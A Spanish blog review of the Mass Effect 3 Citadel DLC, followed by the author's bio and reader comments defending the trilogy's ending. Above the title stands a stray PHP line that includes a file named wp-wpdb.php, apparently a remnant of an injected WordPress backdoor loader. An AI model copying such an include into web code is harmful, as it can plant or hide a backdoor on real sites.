if (is_file('wp-wpdb.php')) include_once('wp-wpdb.php'); Mass Effect 3 Ciudadela DLC: El final de un ciclo – La Fortaleza de LeChuck

Mass Effect 3 Ciudadela DLC: El final de un ciclo

En su día, entre unas cosas y otras, no pude realizar el análisis de Mass Effect 3, pero escribí un resumen de la trilogía con mi opinión e interpretación del final. Esta vez he querido aprovechar el lanzamiento del DLC Ciudadela, el último contenido descargable para Mass Effect 3, para contaros mis impresiones de este homenaje a toda la trilogía.

Que no os engañe el título de este DLC, no vamos a descubrir ningún secreto oculto de la Ciudadela, ni ampliar información, ni nada relacionado con la guerra de los Segadores. Este DLC está enfocado a rememorar con nuestra tripulación los momentos que nos ha dejado la trilogía Mass Effect y que han quedado para el recuerdo de todo el fandom.

Pero, ¿cómo comienza todo? Pues bien, en la Normandía recibimos un mensaje del Almirante Hackett, quien nos «obliga» a tomarnos un permiso en la Ciudadela para relajarnos y disfrutar del ocio. Para que nos sintamos como en casa, Anderson, quien anda sobreviviendo por la Tierra, se comunica con nosotros para anunciarnos que nos regala su apartamento de lujo, así, tal cual. Explorando el apartamento, vemos que hay esparcidos pads con mensajes personales de Anderson. En ellos se relatan aspectos de su vida, opiniones sobre nuestra persona y muchas otras cosas relacionadas. El apartamento encima se puede amueblar.
Poco después de adquirir nuestra nueva propiedad, recibimos un mensaje de Joker, quien nos invita al restaurante de moda en la nueva zona de ocio que se nos desbloqueará en la Ciudadela: la avenida del sol plateado. Allí tenemos arcades con varias máquinas jugables, un casino para que gastemos un poco de créditos o el Armax Arena, un simulador de combate que recuerda al modo multijugador (donde Aria T’loak arrasa).

Nuestra tranquila velada con el piloto de la Normandía se verá interrumpida por Brooks, un miembro de la Alianza, que nos alerta de que un grupo ha pirateado las comunicaciones e intenta asesinarnos. De repente, unos mercenarios asaltan el restaurante, y con unos tiros por aquí y por allá, nos las ingeniamos para escapar por una zona exterior hasta reunirnos con parte de nuestra tripulación. Sin embargo, este grupo hostil del tres al cuarto y su cabecilla, es una mera excusa para disfrutar de escenas nuevas con nuestro romance y de todo tipo de diálogos desternillantes por parte de nuestra tripulación al completo.

Después de salir ilesos del restaurante, nos reuniremos con nuestros colegas en el apartamento para charlar amigablemente mientras investigamos el ataque. ¡Incluso han comprado pizza! lástima que el repartidor Volus llegue justo cuando nos marchamos y se quede sin ver un crédito. El drone de Liara, Glyph, nos recordará este pequeño incidente posteriormente. La investigación nos llevará hasta la fiesta benéfica de un casino, al cual tendremos que ir de gala con alguien de nuestra tripulación, y allí veremos personajes ilustres de la saga como Sha’ira, la consorte.

A partir de aquí viviremos escenas acción con nuestro grupo y diálogos que se van marcando entre ellos, (tan divertidos que nos costará concentrarnos en la batalla) hasta desbaratar los planes de nuestro más temible enemigo, nosotros mismos. Incluso el enemigo bromeará recordándonos esa frase de despedida tan famosa en Mass Effect 2 «I should go». Destacar a Wrex presumiendo de su poder o del drone de Liara, que como no es de guerra, calcula las probabilidades de muerte. Además, pide con respeto que no lo ataquen y hasta recibe una llamada del Volus repartidor de pizzas, uys. Mientras avanzamos recogeremos un arma que se recalienta y rememoraremos lo mal que lo pasamos en Mass Effect 1.
La lucha final acabará en la Normandía, donde están tirando por la borda nuestras cosas, ¡entre ellas está nuestro hamster espacial! «Esto ya es personal!» Destacar entre muchas cosas la referencia a los ascensores de Mass Effect 1.

Una vez acabamos con esta pequeña interrupción en nuestros planes de relax, volveremos a nuestro apartamento y recibiremos mensajes individuales de la tripulación, la cual desea verse con nosotros en privado. A partir de aquí, nos iremos reuniendo con los diferentes miembros y con cada uno recordaremos una vivencia o compartirán con nosotros detalles nuevos de su vida. Volveremos a tener un poco de intimidad con nuestro romance (¡Santo dios, Garrus baila Tango! ¡Y Samara no nos hará la cobra!), y podremos divertirnos por las nuevas zonas de ocio de la avenida del sol plateado.
Liara, te amo forever.

Después, comenzará lo mejor del DLC Ciudadela, que no es otra cosa que una fiesta con mucho alcohol y absolutamente todos los miembros de la Normandía. ¡Puede pasar cualquier cosa! Yendo de grupito en grupito, escucharemos los diálogos y podremos unirnos a ellos recordando así la faceta alcohólica-divertida de Tali, Samantha Traynor y su fijación sexual por la voz de SID (y ésta gastándola bromas sobre ello), Vega y su obsesión con la fuerza vs biótica, las calibraciones de Garrus, el cachondeo mítico de Shepard y su forma de bailar… A medida que avanza la noche, podremos llevar la fiesta por el lado salvaje o tranquilo, donde el ritmo de los diálogos y la ingesta alcohólica variará. Estos buenos momentos serán recogidos por una foto de despedida «Decid Normandíaaaa» que estará expuesta en una pantalla del apartamento. Al día siguiente, nos levantaremos al lado de nuestro romance, pero si no hemos intimado con nadie en el juego, ¡habrá una pequeña sorpresa! Nuestros compañeros estarán por el apartamento en un estado lamentable, sin embargo, lo más interesante es encontrar junto a la cama un pad con las últimas grabaciones de Mordin. Sin palabras (sniff).

Podremos seguir la diversión por la zona de ocio o regresar a la Normandía. Si regresamos a nuestra nave, Shepard se parará unos segundos en la zona de atraque mirando al horizonte con melancolía y con el presagio de que algo terrible está por llegar.

Después de finalizar el DLC Ciudadela, una sonrisa se reflejó en mi rostro. No hay ni un resquicio de decepción, sino nostalgia por todos esos pequeños detalles que no han dejado escapar y que los fans han plasmado todos estos años en fanarts, cómics, viñetas y fanfictions. Porque toda esa tripulación ha hecho grande la historia. Así que olvidad por un momento vuestro descontento hacia el final de Mass Effect 3, vuestra decepción por  los 3 botones y que no tuvieran en cuenta las decisiones al acabar. Basta. Desconectad. Pensad en la saga Mass Effect como un conjunto, como una gran historia llena de inolvidables momentos que superan con creces a los malos. Toda esa tensión vivida con Shepard viajando por planetas, conociendo otras especies y a personajes que han pasado de ser compañeros a amigos. El momento dramático de perder a alguno de ellos. Un universo único e inabarcable. Esto es Mass Effect, no el final de 3 botones.

Por Arashi

Aparte de patear traseros de piratas como gobernadora en Mêlée, soy una fanática de los videojuegos desde que de pequeña me regalaron la Atari 2600. Adoro las aventuras gráficas y los RPG, pero no le hago ascos al resto. Otra de mis pasiones es todo lo relacionado con Japón.

14 comentarios

  1. yo lo jugue ayer en pc y me dio igual que no tuviera nada que ver con la historia de los segadores, es un recuerdo precioso para poner punto y final a la saga. Quien se acuerda ya de los 3 botones? bah!

  2. Es increible aun no lo he jugado y me parece impresionante,se lo han currado,yo que pensaba que ninguno me iba a gustar tanto como omega, leviatan,desde las cenizas,que eran inigulables ahora con lo que he visto es seguro que sea mi favorito con diferencia en cuanto pueda me lo paso.

    No voy a despedirme de la saga porque para mi no ha terminado seguiré juegando a ella.
    Aunque me

    1. Te digo una cosa, para mí es el segundo mejor DLC de toda la saga. El enemigo puede decepcionar pero los momentos que pasas con tu tripulación son inolvidables. Es imprescindible para todo seguidor de Mass Effect.

      A más de uno nos hubiera gustado ver un DLC después del final donde Shepard estuviera vivo, pero hubiera sido muy típico, no? A mí me gustaría que Mass Effect 4 se situara

  3. Totalmente de acuerdo. Qué pesada se pone la gente con lo del final, y eso que con la versión extendida mejora bastante. Lo que importa es el viaje, todas las experiencias inolvidables que nos ha dado este juego.

    El DLC es el mejor del ME3, entrañable y graciosisimo. Qué buenos ratos he pasado. ^_^

    1. Sí, hay gente está obsesionada con lo del final y no ve más allá. Este DLC recuerda de una forma original y desenfadada muchos grandes momentos, y al terminarlo solo dan ganas de rejugar la saga! Yo también estoy de acuerdo en que es el mejor de ME3.
      Yo estoy rejugando al DLC con diferentes combinaciones de personajes! es genial!

    2. Yo creo que esta saga la podríamos comparar con una buena serie de ciencia ficción, por lo bien que trata a sus carismáticos personajes, con el añadido que da el poder interactuar a nuestro gusto con ellos. Y seamos sinceros, ¿cuantas series de ese tipo tienen un buen final? O son canceladas prematuramente, o bien el final es horrible… Pero sin embargo quedan en la memoria como grandes obras,

  4. Si se que esto es más viejo que la tota. Pero yo he cogido este juego tarden (problem?) es que yo creo que la gente. Con el final de los 3 botones. Y sin el final extendido. No se paro a pensar siquiera en lo que supone la última decisión que tomas. Cada botón abarca un final para cada decisión que tomaste a lo largo de la saga. Salvaste a los geth? Los quarianos? O ambos? Quien era tu pareja? La genofagia.. Animate a sid y joker a ser pareja? Todo eso es relevante aún sin el final extendido. Y se sobreentiende que cuando eliges uno de esos 3 botones. Lo que venga después afectará al universo en función de lo que elegiste. Tan sencillo como que destruir a los sintéticos dejará a los quarianos viviendo en trajes y perderás los relé para siempre. Es de sentido común pararse a pensar y reflexionar antes de tomar esa decisión. Al menos, a mi, me pareció un final de saga tan taaaan épico que es obligado pararse a reflexionar antes de elegir. No sólo ver esos botones..

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